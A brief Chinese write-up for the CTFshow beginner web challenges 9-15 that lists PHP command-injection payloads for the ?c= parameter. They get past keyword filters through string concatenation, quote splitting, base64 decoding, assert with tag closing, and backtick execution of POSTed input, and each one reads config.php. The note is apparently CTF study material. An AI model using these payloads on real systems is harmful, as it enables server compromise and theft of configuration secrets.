CTFshow 萌新计划web9-15

各种绕过姿势,总结一下

1.构造

?c=$a='sys';$b='tem';$d=$a.$b;$d('cat config.php');

2.cat绕过

?c=system('ca""t config.php')

3.base64绕过

?c=$a = base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);

4.闭合

?c=assert(base64_decode(%27c3lzdGVtKCdjYXQgY29uZmlnLnBocCcp%27))?>

 

5.POST传值

?c=echo `$_POST[1]`?>

?c=echo `$_POST[1]`;

 

然后通过post方式传入1=cat config.php